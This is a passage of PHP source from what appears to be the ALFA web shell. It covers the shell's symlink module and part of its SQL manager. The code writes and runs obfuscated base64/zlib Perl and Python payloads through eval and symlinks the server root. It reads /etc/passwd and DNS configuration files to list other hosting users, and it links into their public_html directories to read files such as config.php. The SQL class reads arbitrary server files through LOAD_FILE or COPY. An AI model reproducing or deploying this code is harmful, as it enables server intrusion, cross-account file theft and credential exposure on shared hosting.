true);\r\n\t}\r\n}\r\nfunction alfasymlink(){\r\nalfahead();\r\nAlfaNum(9,10);\r\nalfaCreateParentFolder();\r\n@chdir($GLOBALS[\'home_cwd\'] . "/" . __ALFA_DATA_FOLDER__);\r\necho \'<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\\\'symlink\\\',null,null,\\\'symphp\\\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\\\'symlink\\\',null,null,\\\'symperl\\\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\\\'symlink\\\',null,null,\\\'sympy\\\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\\\'symlink\\\',null,null,null,null,\\\'SymFile\\\')">| File Symlink | </a></h3></center>\';\r\nif(isset($_POST[\'alfa2\'])&&($_POST[\'alfa2\']==\'symperl\'||$_POST["alfa2"]=="sympy")){\r\n\t$sympath = alfaMakePwd();\r\n\t@mkdir(\'cgialfa\',0755);\r\n\t@chdir(\'cgialfa\');\r\n\talfacgihtaccess(\'cgi\');\r\n\t$perl = \'#!/usr/bin/perl   -I/usr/local/bandmin\'."\\n".\'use MIME::Base64;use Compress::Zlib;my $alfa_data="\'.__ALFA_DATA_FOLDER__.\'";eval(Compress::Zlib::memGunzip(decode_base64("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")));\';\r\n\t$py = \'#!/usr/bin/python\'."\\nimport zlib, base64\\nalfa_data=\'".__ALFA_DATA_FOLDER__."\'\\n".\'eval(compile(zlib.decompress(base64.b64decode("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")),\\\'<string>\\\',\\\'exec\\\'))\';\r\n\t$cginame = "symperl.alfa";\r\n\t$source = $perl;\r\n\t$lang = "perl";\r\n\tif($_POST["alfa2"]=="sympy"){\r\n\t\t$cginame = "pysymlink.alfa";\r\n\t\t$source = $py;\r\n\t\t$lang = "python";\r\n\t}\r\n\t@__write_file($cginame,$source);\r\n\t@chmod($cginame,0755);\r\n\techo __pre();\r\n\t$resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);\r\n\tif(strlen($resource) == 0){\r\n\t\techo AlfaiFrameCreator(\'cgialfa/\'.$cginame);\r\n\t}else{\r\n\t\techo $resource;\r\n\t}\r\n}\r\nif(isset($_POST[\'alfa4\']) && $_POST[\'alfa4\']==\'SymFile\'){\r\nif(function_exists(\'symlink\')||_alfa_can_runCommand(true,true)){\r\nAlfaNum(9,10);\r\necho __pre().\'\r\n<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\\\'symlink\\\',null,null,null,null,\\\'SymFile\\\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">\r\n<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />\r\n<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>\r\n<p><input type="submit" value=" " name="symlink" /></p></form></center>\';\r\n$path = $_POST[\'alfa5\'];\r\n$symname = $_POST[\'alfa6\'];\r\n$solevisible58 = $_POST[\'alfa7\'];\r\nif($solevisible58){\r\n$new_name = str_replace(".", "_", basename($symname));\r\n$rand_dir = $new_name.rand(111,9999);\r\n$sym_dir = \'alfasymlinkphp/\'.$rand_dir.\'/\';\r\n@mkdir($sym_dir, 0777, true);\r\nalfacgihtaccess(\'sym\', $sym_dir, $symname);\r\n_alfa_symlink("$path","$sym_dir/$symname");\r\necho __pre();\r\necho \'<center><b><font color="white">Click >> </font><a target="_blank" href="\'.__ALFA_DATA_FOLDER__."/".$sym_dir.\'" ><b><font size="4">\'.$symname.\'</font></b></a></b></center>\';\r\n}\r\n}else{echo "<center><pre class=ml1 style=\'margin-top:5px\'><b><font color=\\"#FFFFFF\\">[+] Symlink Function Disabled !</b></font></pre></center>";}\r\n}\r\nif(isset($_POST[\'alfa2\']) && $_POST[\'alfa2\']==\'symphp\'){\r\n$cant_symlink = true;\r\nif(function_exists(\'symlink\')||_alfa_can_runCommand(false,false)){\r\n@mkdir(\'alfasymlink\',0777);\r\nalfacgihtaccess(\'sym\',\'alfasymlink/\');\r\n_alfa_symlink(\'/\',\'alfasymlink/root\');\r\n$table_header = "<pre id=\\"strOutput\\" style=\\"margin-top:5px\\" class=\\"ml1\\"><br><table id=\'tbl_sympphp\' align=\'center\' width=\'40%\' class=\'main\' border=\'1\'><td><span style=\'color:#FFFF01;\'><b>*</span></b></td><td><span style=\'color:#00A220;\'><b>Domains</span></b></td><td><span style=\'color:#FFFFFF;\'><b>Users</span></b></td><td><span style=\'color:#FF0000;\'><b>symlink</span></b></td>";\r\nif(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){\r\necho "<center>";\r\n$lines = array();\r\n$anony_domains = array();\r\n$anonymous_users = array();\r\n$f_black = array();\r\n$error = false;\r\n$anonymous = false;\r\n$makepwd = "/home/{user}/public_html/";\r\n$domains = alfaGetDomains();\r\n$lines = $domains["lines"];\r\n$state = $domains["state"];\r\n$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");\r\n$can_runcmd = _alfa_can_runCommand(false,false);\r\nif(!$is_posix && !$can_runcmd){\r\n\t$anonymous = true;\r\n\t$anony_domains = $domains["lines"];\r\n\t$lines = _alfa_file(\'/etc/passwd\');\r\n}\r\necho $table_header;\r\n$count=1;\r\n$template = \'<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="\'.__ALFA_DATA_FOLDER__.\'/alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>\';\r\nforeach($lines as $line){\r\n\t$domain = "";\r\n\t$owner = "";\r\n\tif($anonymous){\r\n\t\t$explode = explode(":", $line);\r\n\t\t$owner = $explode[0];\r\n\t\t$owner_len = strlen($owner) - 1;\r\n\t\t$userid = $explode[2];\r\n\t\tif((int)$userid < 500)continue;\r\n\t\t$domain = "[?????]";\r\n\t\t$temp_black = array();\r\n\t\t$finded = false;\r\n\t\tforeach($anony_domains as $anony){\r\n\t\t\tif($state == "named.conf"){\r\n\t\t\t\tif(@strstr($anony, \'zone\')){\r\n\t\t\t\t\tpreg_match_all(\'#zone "(.*)"#\',$anony, $data);\r\n\t\t\t\t\t$domain = $data[1][0];\r\n\t\t\t\t}else{\r\n\t\t\t\t\tcontinue;\r\n\t\t\t\t}\r\n\t\t\t}elseif($state == "named" || $state == "valiases"){\r\n\t\t\t\tif($anony == "." || $anony == "..")continue;\r\n\t\t\t\tif($state == "named")$anony = rtrim($anony, ".db");\r\n\t\t\t\t$domain = $anony;\r\n\t\t\t}\r\n\t\t\t$sub_domain = str_replace(array("-","."), "", $domain);\r\n\t\t\tif(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){\r\n\t\t\t\tif(in_array($owner.$domain, $temp_black))continue;\r\n\t\t\t\t$sympath = str_replace("{user}", $owner, $makepwd);\r\n\t\t\t\t$http = "http://".$domain;\r\n\t\t\t\techo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);\r\n\t\t\t\t$count++;\r\n\t\t\t\t$temp_black[] = $owner.$domain;\r\n\t\t\t\t$finded = true;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif(!$finded){\r\n\t\t\t$anonymous_users[] = $owner;\r\n\t\t}\r\n\t}else{\r\n \t\tif($state == "named.conf"){\r\n\t\t\tif(@strstr($line, \'zone\')){\r\n\t\t\t\tpreg_match_all(\'#zone "(.*)"#\',$line, $data);\r\n\t\t\t\t$domain = $data[1][0];\r\n\t\t\t}else{\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\t\t}elseif($state == "named" || $state == "valiases"){\r\n\t\t\tif($line == "." || $line == "..")continue;\r\n\t\t\tif($state == "named")$line = rtrim($line, ".db");\r\n\t\t\t$domain = $line;\r\n\t\t}\r\n\t\tif(strlen(trim($domain)) > 2 && $state != "passwd"){\r\n\t\t\tif(!_alfa_file_exists(\'/etc/valiases/\'.$domain, false))continue;\r\n\t\t\tif($is_posix){\r\n\t\t\t\t$user = @posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain));\r\n\t\t\t\t$owner = $user["name"];\r\n\t\t\t}elseif($can_runcmd){\r\n\t\t\t\t$owner = alfaEx("stat -c \'%U\' /etc/valiases/".$domain,false,false);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(!$anonymous){\r\n\t\tif(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;\r\n\t\t$sympath = str_replace("{user}", $owner, $makepwd);\r\n\t\t$http = "http://".$domain;\r\n\t\tif($state == "passwd"){\r\n\t\t\t$http = "javascript:alert(\'we cant find domain...\')";\r\n\t\t}\r\n\t\techo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);\r\n\t\t$count++;\r\n\t\t$f_black[] = $owner.$domain;\r\n\t}\r\n}\r\nif($anonymous){\r\n\tforeach($anonymous_users as $owner){\r\n\t\t$sympath = str_replace("{user}", $owner, $makepwd);\r\n\t\t$http = "javascript:alert(\'we cant find domain...\')";\r\n\t\techo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);\r\n\t\t$count++;\r\n\t}\r\n}\r\n$cant_symlink = false;\r\n}else{\r\n$is_direct = false;\r\n$makepwd = alfaMakePwd();\r\nif(_alfa_file_exists("/etc/virtual/domainowners")){\r\n\t$makepwd = "/home/{user}/public_html";\r\n\t$is_direct = true;\r\n}\r\n$sole = _alfa_file("/etc/virtual/domainowners");\r\n$count=1;\r\necho $table_header;\r\n$template = \'<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="\'.__ALFA_DATA_FOLDER__.\'/alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>\';\r\nif($sole){\r\n\tforeach($sole as $visible){\r\n\t\tif(@strstr($visible,":")){\r\n\t\t\t$solevisible = explode(\':\', $visible);\r\n\t\t\t$cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);\r\n\t\t\techo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);\r\n\t\t}\r\n\t}\r\n}else{\r\n\t$passwd = _alfa_file("/etc/passwd");\r\n\tif($passwd){\r\n\t\t$html = "";\r\n\t\t$is_named = false;\r\n\t\t$users = array();\r\n\t\t$domains = array();\r\n\t\t$uknowns = array();\r\n\t\tforeach($passwd as $user){\r\n\t\t\t$user = trim($user);\r\n\t\t\t$expl = explode(":", $user);\r\n\t\t\tif((int)$expl[2] < 500)continue;\r\n\t\t\t$users[$expl[0]] = $expl[5];\r\n\t\t}\r\n\t\t$site_domains = @scandir("/etc/virtual/");\r\n\t\tif(!$site_domains){\r\n\t\t\t$site_domains = alfaEx("ls /etc/virtual/");\r\n\t\t\t$site_domains = explode("\\n", $site_domains);\r\n\t\t\tif(!$site_domains){\r\n\t\t\t\t$site_domains = _alfa_file("/etc/named.conf");\r\n\t\t\t\tif($site_domains){$is_named = true;}\r\n\t\t\t}\r\n\t\t}\r\n\t\tforeach($site_domains as $line){\r\n\t\t\tif($is_named){\r\n\t\t\t\tif(@strstr($line, \'zone\')){\r\n\t\t\t\t\tpreg_match_all(\'#zone "(.*)"#\',$line, $data);\r\n\t\t\t\t\t$domain = $data[1][0];\r\n\t\t\t\t\tif(strlen($domain  > 2) && !empty($domain)){\r\n\t\t\t\t\t\t$domains[] = $domain;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}else{\r\n\t\t\t\t$domains[] = $line;\r\n\t\t\t}\r\n\t\t}\r\n\t\t$x = 1;\r\n\t\tforeach($users as $user => $home){\r\n\t\t\tforeach($domains as $domain){\r\n\t\t\t\t$user_len = strlen($user) - 1;\r\n\t\t\t\t$sub_domain = str_replace(array("-","."), "", $domain);\r\n\t\t\t\t$five_user = substr($user, 0,$user_len);\r\n\t\t\t\t$five_domain = substr($sub_domain, 0,$user_len);\r\n\t\t\t\tif($five_user == $five_domain){\r\n\t\t\t\t\tif($is_direct){\r\n\t\t\t\t\t\t$cwd = str_replace("{user}", $user, $makepwd);\r\n\t\t\t\t\t}else{\r\n\t\t\t\t\t\t$expl = explode("}/", $makepwd);\r\n\t\t\t\t\t\t$cwd = $home."/".$expl[1];\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);\r\n\t\t\t\t}else{\r\n\t\t\t\t\t$uknowns[$user] = $home;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\t$uknowns = array_unique($uknowns);\r\n\t\tforeach($uknowns as $user => $home){\r\n\t\t\tif($is_direct){\r\n\t\t\t\t$cwd = str_replace("{user}", $user, $makepwd);\r\n\t\t\t}else{\r\n\t\t\t\t$expl = explode("}/", $makepwd);\r\n\t\t\t\t$cwd = $home."/".$expl[1];\r\n\t\t\t}\r\n\t\t\t$html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);\r\n\t\t}\r\n\t\techo($html);\r\n\t}\r\n}\r\necho "</table>";\r\n$cant_symlink = false;\r\n}\r\n}else{\r\n\techo "<pre class=ml1 style=\'margin-top:5px\'><b><font color=\\"#FFFFFF\\">[+] Symlink Function Disabled !</b></font></pre></center>";\r\n\t$cant_symlink = false;\r\n}\r\nif($cant_symlink)echo \'<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>\';\r\necho "</center></table>";\r\n}\r\necho "</div>";\r\nalfafooter();\r\n}\r\nfunction alfasql(){\r\nclass DbClass{\r\npublic $type;\r\npublic $link;\r\npublic $res;\r\npublic $mysqli_connect_error = false;\r\npublic $mysqli_connect_error_msg = "";\r\nfunction __construct($type){\r\n$this->type = $type;\r\n}\r\nfunction connect($host, $user, $pass, $dbname){\r\nswitch($this->type){\r\ncase \'mysql\':\r\nif($this->link = @mysqli_connect($host,$user,$pass,$dbname)){\r\n\treturn true;\r\n}else{\r\n\t$this->mysqli_connect_error = true;\r\n\t$this->mysqli_connect_error_msg = mysqli_connect_error();\r\n\treturn false;\r\n}\r\nbreak;\r\ncase \'pgsql\':\r\n$host = explode(\':\', $host);\r\nif(!$host[1]) $host[1]=5432;\r\nif( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\nfunction selectdb($db){\r\nswitch($this->type){\r\ncase \'mysql\':\r\nif(@mysqli_select_db($db))return true;\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\nfunction query($str){\r\nswitch($this->type){\r\ncase \'mysql\':\r\nreturn $this->res = @mysqli_query($this->link,$str);\r\nbreak;\r\ncase \'pgsql\':\r\nreturn $this->res = @pg_query($this->link,$str);\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\nfunction fetch(){\r\n$res = func_num_args()?func_get_arg(0):$this->res;\r\nswitch($this->type){\r\ncase \'mysql\':\r\nreturn @mysqli_fetch_assoc($res);\r\nbreak;\r\ncase \'pgsql\':\r\nreturn @pg_fetch_assoc($res);\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\nfunction listDbs(){\r\nswitch($this->type){\r\ncase \'mysql\':\r\nreturn $this->query("SHOW databases");\r\nbreak;\r\ncase \'pgsql\':\r\nreturn $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'");\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\nfunction listTables(){\r\nswitch($this->type){\r\ncase \'mysql\':\r\nreturn $this->res = $this->query(\'SHOW TABLES\');\r\nbreak;\r\ncase \'pgsql\':\r\nreturn $this->res = $this->query("select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'");\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\nfunction error(){\r\nswitch($this->type){\r\ncase \'mysql\':\r\nreturn @mysqli_error($this->link);\r\nbreak;\r\ncase \'pgsql\':\r\nreturn @pg_last_error();\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\nfunction setCharset($str){\r\nswitch($this->type){\r\ncase \'mysql\':\r\nif(function_exists(\'mysql_set_charset\'))\r\nreturn @mysqli_set_charset($this->link,$str);\r\nelse\r\n$this->query(\'SET CHARSET \'.$str);\r\nbreak;\r\ncase \'pgsql\':\r\nreturn @pg_set_client_encoding($this->link, $str);\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\nfunction loadFile($str){\r\nswitch($this->type){\r\ncase \'mysql\':\r\nreturn $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));\r\nbreak;\r\ncase \'pgsql\':\r\n$this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM \'".addslashes($str)."\';select file from solevisible;");\r\n$r=array();\r\nwhile($i=$this->fetch())\r\n$r[] = $i[\'file\'];\r\n$this->query(\'drop table solevisible\');\r\nreturn array(\'file\'=>implode("\\n",$r));\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\n};\r\n$db = new DbClass($_POST[\'type\']);\r\nalfahead();\r\n$form_visibility = "table";\r\nif(isset($_POST[\'sql_host\'])){\r\n\t$connection_db = $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n\tif($connection_db && !empty($_POST[\'sql_base\'])){\r\n\t\t$form_visibility = "none";\r\n\t}\r\n}\r\n$database_list = array();\r\necho "\r\n<div class=\'header\' style=\'min-height:300px;\'>".($form_visibility!="none"?"<center><div class=\'txtfont_header\'>| Sql Manager |</div><p>".getConfigHtml(\'all\')."</p></center><div style=\'text-align:center;margin-bottom: 10px;\'><button class=\'connection-his-btn db-opt-id\' onclick=\'alfaShowConnectionHistory(this);\' mode=\'on\'>Connection History</button><div class=\'connection_history_holder\'></div></div>":"")."\r\n<div class=\'sf\' class=\'db-opt-id\'><table style=\'margin: 0 auto;".($form_visibility=="none"?"display:none;":"")."\' cellpadding=\'2\' cellspacing=\'0\'><tr>\r\n<td><div class=\\"txtfont\\">TYPE</div></td><td><div class=\\"txtfont\\">HOST</div></td><td><div class=\\"txtfont\\">DB USER</div></td><td><div class=\\"txtfont\\">DB PASS</div></td><td><div class=\\"txtfont\\">DB NAME</div></td><td></td></tr><tr>\r\n<td><select name=\'type\'><option value=\'mysql\' selected>mysql</option></select></td>\r\n<td><input type=\'text\' name=\'sql_host\' id=\'db_host\' value=\'". (empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])) ."\'></td>\r\n<td><input type=\'text\' name=\'sql_login\' id=\'db_user\' value=\'". (empty($_POST[\'sql_login\'])?\'\':htmlspecialchars($_POST[\'sql_login\'])) ."\'></td>\r\n<td><input type=\'text\' name=\'sql_pass\' id=\'db_pw\' value=\'". (empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])) ."\'></td><td>";\r\n$tmp = "<input type=\'text\' name=\'sql_base\' id=\'db_name\' value=\'". (empty($_POST[\'sql_base\'])?\'\':htmlspecialchars($_POST[\'sql_base\'])) ."\'>";\r\nif(isset($_POST[\'sql_host\'])){\r\nif($connection_db){\r\n$db->setCharset(\'utf8\');\r\n$db->listDbs();\r\necho "<select name=sql_base><option value=\'\'></option>";\r\nwhile($item = $db->fetch()) {\r\nlist($key, $value) = each($item);\r\n$database_list[] = $value;\r\necho \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n}\r\necho \'</select>\';\r\n}else{\r\n\techo $tmp;\r\n}\r\n}else\r\necho $tmp;\r\n$curr_mysql_id = 